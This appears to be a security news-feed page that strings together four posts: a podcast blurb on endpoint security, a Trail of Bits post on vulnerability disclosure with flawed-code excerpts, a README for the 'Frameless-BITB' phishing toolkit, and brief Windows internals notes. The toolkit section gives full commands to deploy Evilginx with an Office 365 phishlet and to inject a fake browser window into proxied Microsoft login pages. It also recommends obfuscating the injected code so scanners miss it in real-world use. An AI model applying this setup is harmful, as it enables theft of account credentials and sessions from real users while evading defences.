
Working as a CIO and the challenges of endpoint security | Guest Tom Molden

By: Infosec
15 April 2024 at 18:00

Today on Cyber Work, our deep-dive into manufacturing and operational technology (OT) cybersecurity brings us to the problem of endpoint security. Tom Molden, CIO of Global Executive Engagement at Tanium, has been grappling with these problems for a while. We talk about his early, formative tech experiences (pre-Windows operating systems!), his transformational move from fiscal strategy and implementation into his first role as chief information officer, and we talk through the interlocking problems that come from connected manufacturing devices and the specific benefits and challenges to be found in strategizing around the endpoints. All of the endpoints.

0:00 - Manufacturing and endpoint security
1:44 - Tom Molden's early interest in computers
4:06 - Early data usage
6:26 - Becoming a CIO
10:29 - Difference between a CIO and CISO
14:57 - Problems for manufacturing companies
18:45 - Best CIO problems to solve in manufacturing
22:51 - Security challenges of manufacturing
26:00 - The scope of endpoint issues
33:27 - Endpoints in manufacturing security
37:12 - How to work in manufacturing security
39:29 - Manufacturing security skills gaps
41:54 - Gain manufacturing security work experience
43:41 - Tom Molden's best career advice received
46:26 - What is Tanium
47:58 - Learn more about Tom Molden
48:34 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec's mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ's security awareness training. Learn more at infosecinstitute.com.


5 reasons to strive for better disclosure processes

15 April 2024 at 13:00

By Max Ammann

This blog showcases five examples of real-world vulnerabilities that we've disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes.

Here are the five bugs:

  • Undefined behavior in the borsh-rs Rust library
  • A denial-of-service (DoS) vector in Rust libraries for parsing the Ethereum ABI
  • A missing limit on authentication tag length in Expo
  • A DoS vector in the num-bigint Rust library
  • Insertion of the MMKV database encryption key into the Android system log with react-native-mmkv

Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner.

In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub's feature has several benefits:

  • Discreet and secure alerts to developers: no need for PGP-encrypted emails
  • Streamlined process: no playing hide-and-seek with company email addresses
  • Simple CVE issuance: no need to file a CVE form at MITRE

Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post.

Case 1: Undefined behavior in borsh-rs Rust library

The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that was not fixed for two years.

During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don't implement the Copy trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library's users were not informed about the bug.

The whole process could have been streamlined using GitHub's private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub.

I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed.

The following code contained the bug that caused undefined behavior:

impl<T> BorshDeserialize for Vec<T>
where
    T: BorshDeserialize,
{
    #[inline]
    fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> {
        let len = u32::deserialize(reader)?;
        if size_of::<T>() == 0 {
            let mut result = Vec::new();
            result.push(T::deserialize(reader)?);

            let p = result.as_mut_ptr();
            unsafe {
                forget(result);
                let len = len as usize;
                let result = Vec::from_raw_parts(p, len, len);
                Ok(result)
            }
        } else {
            // TODO(16): return capacity allocation when we can safely do that.
            let mut result = Vec::with_capacity(hint::cautious::<T>(len));
            for _ in 0..len {
                result.push(T::deserialize(reader)?);
            }
            Ok(result)
        }
    }
}

Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123-150)

The code in figure 1 deserializes bytes to a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32. After that, the code allocates an empty Vec type. Then it pushes a single instance of T into it. Later, it temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs it by setting the length and capacity of Vec to the requested length. As a result, the unsafe Rust code assumes that T is copyable.

The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness.
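To make the soundness issue concrete, here is a minimal, safe Rust sketch (not the original report's proof of concept; the Token type is hypothetical) showing why claiming extra elements of a non-Copy zero-sized type is unsound: a zero-sized type can still have a Drop implementation, and Drop must run exactly once for every value that was actually constructed.

struct Token; // zero-sized, but not Copy because it has a Drop impl

impl Drop for Token {
    fn drop(&mut self) {
        println!("dropping a Token");
    }
}

fn main() {
    // Safe construction: three values are created, so Drop runs three times.
    let v: Vec<Token> = (0..3).map(|_| Token).collect();
    drop(v);

    // The vulnerable deserializer constructed only one value and then used
    // Vec::from_raw_parts to claim `len` elements, with `len` taken from the
    // attacker-controlled input. Dropping that Vec would run Drop on values
    // that were never created, which is undefined behavior for non-Copy types.
}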

Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI

In July, I disclosed multiple DoS vulnerabilities in four Ethereum ABI parsing libraries, which were difficult to report because I had to reach out to multiple parties.

The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing:

https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa71b40dae1f597bc063bdf.patch

In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README file would streamline communication and reduce effort.

Read more about the technical details of this bug in the blog post Billion times emptiness.

Case 3: Missing limit on authentication tag length in Expo

In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software.

When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, [email protected], an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year.

Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had.

Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext:

/* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException {

  byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8);
  byte[] ciphertextBytes = cipher.doFinal(plaintextBytes);
  String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP);

  String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP);
  int authenticationTagLength = gcmSpec.getTLen();

  JSONObject result = new JSONObject()
    .put(CIPHERTEXT_PROPERTY, ciphertext)
    .put(IV_PROPERTY, ivString)
    .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength);

  postEncryptionCallback.run(promise, result);

  return result;
}

Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java)

For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore.

An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST.

From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there.
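For illustration, the following Java sketch shows one way the recommendation could be implemented. This is a hypothetical example (FixedTagLengthDecryption is not Expo's actual code): the tag length comes from a constant, so an attacker who tampers with the stored item cannot downgrade it.

import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

public class FixedTagLengthDecryption {
  // Always use a full 128-bit GCM authentication tag, regardless of what is stored.
  private static final int GCM_TAG_LENGTH_BITS = 128;

  public static byte[] decrypt(SecretKey key, byte[] iv, byte[] ciphertext) throws Exception {
    Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
    // The tag length is taken from the constant above, never from storage.
    cipher.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(GCM_TAG_LENGTH_BITS, iv));
    return cipher.doFinal(ciphertext);
  }
}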

The story would have ended here since we didn't receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits.

The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately.

Case 4: DoS vector in the num-bigint Rust library

In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE.

The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by sending an email. But finding the developer's email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you've reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear.

But now let's discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails.

The num-bigint types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature:

use num_bigint::BigUint;
use std::io::Read;

fn main() -> std::io::Result<()> {
    let mut buf = Vec::new();
    let _ = std::io::stdin().read_to_end(&mut buf)?;
    let _: BigUint = bincode::deserialize(&buf).unwrap_or_default();
    Ok(())
}

Figure 3: Example deserialization format

It turns out that certain inputs cause the above program to crash. This is because the implementation of the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory allocation of 2893606913523067072 bytes failed.

impl<'de> Visitor<'de> for U32Visitor {
    type Value = BigUint;

    {...omitted for brevity...}

    #[cfg(not(u64_digit))]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        let len = seq.size_hint().unwrap_or(0);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }

    #[cfg(u64_digit)]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        use crate::big_digit::BigDigit;
        use num_integer::Integer;

        let u32_len = seq.size_hint().unwrap_or(0);
        let len = Integer::div_ceil(&u32_len, &2);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }
}

Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61-108)
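A common defensive pattern for this class of bug, sketched below as a generic example (not necessarily the fix that num-bigint shipped), is to treat size_hint() as untrusted and cap how much memory is pre-allocated from it, letting the vector grow normally if the input really is that long.

use serde::de::SeqAccess;

// Upper bound on how much memory we are willing to pre-allocate from a hint.
const MAX_PREALLOC: usize = 4096;

fn collect_u32s<'de, S>(mut seq: S) -> Result<Vec<u32>, S::Error>
where
    S: SeqAccess<'de>,
{
    // size_hint() ultimately comes from attacker-controlled input in formats
    // like bincode, so it must not drive an unbounded allocation.
    let capacity = seq.size_hint().unwrap_or(0).min(MAX_PREALLOC);
    let mut data = Vec::with_capacity(capacity);
    while let Some(value) = seq.next_element::<u32>()? {
        data.push(value);
    }
    Ok(data)
}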

We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1 on August 22, 2023. The fixed version was released the next day as 0.4.4.

Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv

The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark.

During the client engagement, I wanted to validate how the encryption key was used and handled. The commit "fix: Don't leak encryption key in logs" in the react-native-mmkv library caught my attention. The following code shows the problematic log statement:

MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path,
                               std::string cryptKey) {
  __android_log_print(ANDROID_LOG_INFO, "RNMMKV",
                      "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)",
                      instanceId.c_str(), path.c_str(), cryptKey.c_str());
  std::string* pathPtr = path.size() > 0 ? &path : nullptr;
  {...omitted for brevity...}

Figure 5: Code that initializes MMKV and also logs the encryption key

Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled.

With the client’s agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv when running npm audit or npm install.

This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to get a vulnerability into the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process.

Takeaways

GitHub's private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database, a link that is missing, for example, when using confidential issues in GitLab. With GitHub's private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers).

The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you've ever encrypted an email, you know that there are endless pitfalls.

However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness.

Step 1: Add a security policy

Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability.

GitHub has two ways to publish a security policy. Either you can create a SECURITY.md file in the repository root, or you can create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root.

We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following:

We have multiple channels for receiving reports:

* If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/[YOUR_ORG]/[YOUR_PROJECT].
* Send an email to [email protected]

Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly.

Step 2: Enable private reporting

Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it's publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies.

Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it's not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require.

After configuring the notifications, go to the "Security" tab of your repository and click "Enable vulnerability reporting".

Emails about reported vulnerabilities have the subject line "(org/repo) Summary (GHSA-0000-0000-0000)". If you use the website notifications, you will see a similar alert there.

If you want to enable private reporting for your whole organization, then check out this documentation.

A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then their dependencies on your project are updated automatically.

On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub.

This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design.

Step 3: Get notifications via webhooks

If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the "Repository advisories" event type.

After creating the webhook, repository_advisory events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability.

How to make security researchers happy

If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day.

If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting.

If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.

Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

By: Zion3R
15 April 2024 at 12:30


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. Watch Video


Video Tutorial

Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very cautious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML alongside the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to create the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts. A rough example of the substitution idea is sketched below.
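The sketch below is illustrative only (the actual rules live in this repo's custom-subs config files and are more involved): a hypothetical Apache mod_substitute rule that injects BITB markup and a script into the proxied HTML on the fly. The element ID and script path are made up.

<Location "/">
    # Hypothetical example: rewrite the proxied HTML in transit and append
    # the BITB container and script right before the closing body tag.
    AddOutputFilterByType SUBSTITUTE text/html
    Substitute "s|</body>|<div id='bitb-window'></div><script src='/bitb.js'></script></body>|i"
</Location>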

Instructions

Video Tutorial


Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to the user's home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener line and set it to no > DNSStubListener=no

then

sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Check that Apache and VM networking work by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)

sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode, and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of the two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

Simply to make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file to point the domain used in this demo, fake.com, and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

C:\Windows\System32\drivers\etc\

Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate. IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic, instead place the certificate in a specific store: select "Trusted Root Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


Windows Internals Notes

27 January 2024 at 02:40

I spent some time over the Christmas break last year learning the basics of Windows Internals and thought it was a good opportunity to use my naive reverse engineering skills to find answers to my own questions. This is not a blog but rather my own notes on Windows Internals. I'll keep updating them and adding new notes as I learn more.

Windows Native API

As mentioned on Wikipedia, several native Windows API calls are implemented in ntoskrnl.exe and can be accessed from user mode through ntdll.dll. The entry point of NTDLL is LdrInitializeThunk, and native API calls are handled by the kernel via the System Service Descriptor Table (SSDT).

